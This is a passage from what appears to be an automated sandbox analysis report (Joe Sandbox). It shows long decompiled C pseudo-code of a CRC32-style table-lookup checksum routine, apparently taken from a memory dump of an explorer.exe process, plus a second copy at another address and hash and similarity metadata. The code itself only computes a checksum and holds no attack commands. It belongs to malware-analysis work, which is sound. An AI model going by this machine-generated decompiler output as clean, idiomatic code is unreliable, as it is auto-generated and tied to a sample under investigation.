& 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t101 & 0x000000ff) * 4) ^  *(_t175 + 0xc)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + (( *(0x15313d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t101 & 0x000000ff) * 4) ^  *(_t175 + 0xc)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t198 & 0x000000ff) * 4) ^  *(_t175 + 0x10)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + (( *(0x15313d0 + (( *(0x15313d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t101 & 0x000000ff) * 4) ^  *(_t175 + 0xc)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + (( *(0x15313d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t101 & 0x000000ff) * 4) ^  *(_t175 + 0xc)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + (( *(0x15313d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x1531bd0 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t101 & 0x000000ff) * 4) ^  *(_t175 + 0xc)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t198 & 0x000000ff) * 4) ^  *(_t175 + 0x10)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t110 & 0x000000ff) * 4) ^  *(_t175 + 0x14);
						_t175 = _t175 + 0x20;
						_t119 =  *(0x15313d0 + (_t207 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (_t207 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (_t207 >> 0x18) * 4) ^  *(0x1531bd0 + (_t207 & 0x000000ff) * 4) ^  *(_t175 - 8);
						_t232 = _t232 - 0x20;
						_t87 =  *(0x15313d0 + (( *(0x15313d0 + (( *(0x15313d0 + (_t207 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (_t207 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (_t207 >> 0x18) * 4) ^  *(0x1531bd0 + (_t207 & 0x000000ff) * 4) ^  *(_t175 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + (_t207 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (_t207 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (_t207 >> 0x18) * 4) ^  *(0x1531bd0 + (_t207 & 0x000000ff) * 4) ^  *(_t175 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (_t119 >> 0x18) * 4) ^  *(0x1531bd0 + (_t119 & 0x000000ff) * 4) ^  *(_t175 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + (( *(0x15313d0 + (_t207 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (_t207 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (_t207 >> 0x18) * 4) ^  *(0x1531bd0 + (_t207 & 0x000000ff) * 4) ^  *(_t175 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + (_t207 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (_t207 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (_t207 >> 0x18) * 4) ^  *(0x1531bd0 + (_t207 & 0x000000ff) * 4) ^  *(_t175 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (_t119 >> 0x18) * 4) ^  *(0x1531bd0 + (_t119 & 0x000000ff) * 4) ^  *(_t175 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (( *(0x15313d0 + (( *(0x15313d0 + (_t207 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (_t207 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (_t207 >> 0x18) * 4) ^  *(0x1531bd0 + (_t207 & 0x000000ff) * 4) ^  *(_t175 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (( *(0x15313d0 + (_t207 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (_t207 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (_t207 >> 0x18) * 4) ^  *(0x1531bd0 + (_t207 & 0x000000ff) * 4) ^  *(_t175 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (_t119 >> 0x18) * 4) ^  *(0x1531bd0 + (_t119 & 0x000000ff) * 4) ^  *(_t175 - 4)) >> 0x18) * 4) ^  *(0x1531bd0 + (_t216 & 0x000000ff) * 4);
						_t231 = _t231 - 1;
					} while (_t231 != 0);
				}
				if(_t232 >= 4) {
					_t181 = _t232 >> 2;
					do {
						_t90 = _t87 ^  *_t175;
						_t175 = _t175 + 4;
						_t232 = _t232 - 4;
						_t181 = _t181 - 1;
						_t87 =  *(0x15313d0 + (_t90 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x15317d0 + (_t90 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1530fd0 + (_t90 >> 0x18) * 4) ^  *(0x1531bd0 + (_t90 & 0x000000ff) * 4);
					} while (_t181 != 0);
				}
				if(_t232 != 0) {
					do {
						_t87 = _t87 >> 0x00000008 ^  *(0x1530fd0 + (( *_t175 & 0x000000ff ^ _t87) & 0x000000ff) * 4);
						_t175 = _t175 + 1;
						_t232 = _t232 - 1;
					} while (_t232 != 0);
				}
				return  !_t87;
			}

0x015272c0
0x015272c1
0x015272c3
0x015272c7
0x015272d0
0x015272e3
0x015272ea
0x015272eb
0x015272ec
0x00000000
0x00000000
0x00000000
0x015272ec
0x015272d0
0x015272ee
0x015272f3
0x015272fb
0x01527300
0x0152743a
0x01527479
0x0152747c
0x0152747f
0x015274f6
0x015274fd
0x015274fd
0x01527300
0x01527507
0x0152750b
0x01527510
0x01527510
0x01527512
0x01527551
0x01527554
0x01527555
0x01527555
0x01527510
0x0152755d
0x01527560
0x0152756e
0x01527575
0x01527576
0x01527576
0x01527560
0x0152757c

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 105357e8f9c9476bf0a14d457aca14cc0032a352b6a46353477ec7a6d161f933
Instruction ID: 1702c55a79b2b1614469f1105927b51c0f4c061eea817c013a04d8a37b0cce5c
Opcode Fuzzy Hash: 105357e8f9c9476bf0a14d457aca14cc0032a352b6a46353477ec7a6d161f933
Instruction Fuzzy Hash: 3261533266096347E375CE7EECC07253352E7CA381F1A8530DA208F79EC639B566A781

Uniqueness

Uniqueness Score: 0.00%

Function 00403120, Relevance: .2, Instructions: 179
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00403120(signed int __eax, signed char __ecx, unsigned int __edx) {
				signed int _t87;
				signed int _t90;
				signed char _t175;
				unsigned int _t181;
				signed int _t207;
				unsigned int _t231;
				unsigned int _t232;

				_t175 = __ecx;
				_t232 = __edx;
				_t87 =  !__eax;
				if(__edx != 0) {
					while((_t175 & 0x00000003) != 0) {
						_t87 = _t87 >> 0x00000008 ^  *(0x4098d8 + (( *_t175 & 0x000000ff ^ _t87) & 0x000000ff) * 4);
						_t175 = _t175 + 1;
						_t232 = _t232 - 1;
						if(_t232 != 0) {
							continue;
						}
						goto L4;
					}
				}
				L4:
				if(_t232 >= 0x20) {
					_t231 = _t232 >> 5;
					do {
						_t207 =  *(0x409cd8 + (( *(0x409cd8 + (( *(0x409cd8 + (( *(0x409cd8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) 